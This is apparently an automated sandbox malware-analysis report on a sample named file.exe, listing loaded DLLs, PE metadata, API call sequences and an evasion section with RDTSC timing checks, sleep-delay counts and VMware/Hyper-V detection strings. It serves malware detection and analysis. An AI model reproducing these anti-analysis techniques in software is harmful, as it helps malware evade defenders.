Source: C:\Windows\explorer.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe | Section loaded: icu.dll
Source: C:\Windows\explorer.exe | Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe | Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe | Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe | Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe | Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe | Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: schannel.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: stobject.dll
Source: C:\Windows\explorer.exe | Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe | Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe | Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe | Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe | Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe | Section loaded: container.dll
Source: C:\Windows\explorer.exe | Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe | Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe | Section loaded: samlib.dll
Source: C:\Windows\explorer.exe | Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe | Section loaded: sxs.dll
Source: C:\Windows\explorer.exe | Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: es.dll
Source: C:\Windows\explorer.exe | Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe | Section loaded: dxp.dll
Source: C:\Windows\explorer.exe | Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe | Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe | Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe | Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe | Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe | Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe | Section loaded: audioses.dll
Source: C:\Windows\explorer.exe | Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe | Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe | Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe | Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe | Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe | Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe | Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe | Section loaded: wer.dll
Source: C:\Windows\explorer.exe | Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe | Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe | Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe | Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe | Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe | Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe | Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe | Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe | Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe | Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe | Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe | Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe | Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe | Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe | Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe | Section loaded: credui.dll
Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
Source: C:\Windows\explorer.exe | Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe | Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe | Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: file.exe | Static file information: File size 1482240 > 1048576
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP | source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb | source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb | source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL | source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDE01E LoadLibraryA,GetProcAddress,0_2_00EDE01E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEC09E push esi; ret 0_2_00EEC0A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEC187 push edi; ret 0_2_00EEC189
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F2C8BC push esi; ret 0_2_00F2C8BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE6B05 push ecx; ret 0_2_00EE6B18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0B2B1 push FFFFFF8Bh; iretd 0_2_00F0B2B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEBDAA push edi; ret 0_2_00EEBDAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEBEC3 push esi; ret 0_2_00EEBEC5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx 1_2_02F309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AD4DB push eax; ret 1_2_024AD542
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AD4D2 push eax; ret 1_2_024AD4D8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AD485 push eax; ret 1_2_024AD4D8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AD53C push eax; ret 1_2_024AD542
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A6B48 push ebp; retf 1_2_024A6B63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02499BA9 push ecx; ret 1_2_02499BB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A7933 push esi; ret | 1_2_024A7934
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AE9AD push dword ptr [D2425A3Fh]; ret | 1_2_024AE9CF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A7D70 push ebx; ret | 1_2_024A7D7D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A7D9A push ebx; ret | 1_2_024A7D7D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0EB02 push esp; retn 0000h | 1_2_02E0EB03
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0EB1E push esp; retn 0000h | 1_2_02E0EB1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0E9B5 push esp; retn 0000h | 1_2_02E0EAE7
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BEB1E push esp; retn 0000h | 2_2_0E5BEB1F
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BEB02 push esp; retn 0000h | 2_2_0E5BEB03
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BE9B5 push esp; retn 0000h | 2_2_0E5BEAE7
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F644B02 push esp; retn 0000h | 2_2_0F644B03
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F644B1E push esp; retn 0000h | 2_2_0F644B1F
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F6449B5 push esp; retn 0000h | 2_2_0F644AE7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00DE003D push ecx; ret | 4_2_00DE0050
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0323225F pushad ; ret | 4_2_032327F9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032327FA pushad ; ret | 4_2_032327F9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F28111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_00F28111
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00EDEB42
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00EE123A
          Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\explorer.exe | System information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\file.exe | API/Special instruction interceptor: Address: 116EA74
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 2499904 second address: 249990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 2499B7E second address: 2499B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: AA9904 second address: AA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: AA9B7E second address: AA9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E rdtsc | 1_2_02F7096E
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 8227
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1715
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 883
          Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 2125
          Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 7848
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-94115
          Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-92846
          Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
          Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 2.1 %
          Source: C:\Windows\SysWOW64\wlanext.exe | API coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5680 | Thread sleep count: 8227 > 30
          Source: C:\Windows\explorer.exe TID: 5680 | Thread sleep time: -16454000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5680 | Thread sleep count: 1715 > 30
          Source: C:\Windows\explorer.exe TID: 5680 | Thread sleep time: -3430000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564 | Thread sleep count: 2125 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564 | Thread sleep time: -4250000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564 | Thread sleep count: 7848 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4564 | Thread sleep time: -15696000s >= -30000s
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F06CA9 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00F06CA9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose | 0_2_00F060DD
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose | 0_2_00F063F9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00F0EB60
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00F0F5FA
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F56F FindFirstFileW,FindClose | 0_2_00F0F56F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F11B2F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F11C8A
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00F11F94
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00EDDDC0
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000009
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C914000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\W%
          Source: explorer.exe, 0000000E.00000003.2810762263.000000000C9EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2757327610.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759463739.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000E.00000003.2842304011.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\d%
          Source: explorer.exe, 0000000E.00000003.2810762263.000000000C9EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000E.00000003.2811183670.000000000C830000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:M
          Source: explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWa
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000E.00000003.2809741840.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000a@v
          Source: explorer.exe, 0000000E.00000003.2839857890.000000000C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_
          Source: explorer.exe, 0000000E.00000002.3020099476.000000000C914000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000E.00000003.2818462375.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000002.2695744148.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 0000000E.00000002.2915536056.00000000010B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000!#
          Source: explorer.exe, 0000000E.00000003.2825363146.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\E$
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000S=:x
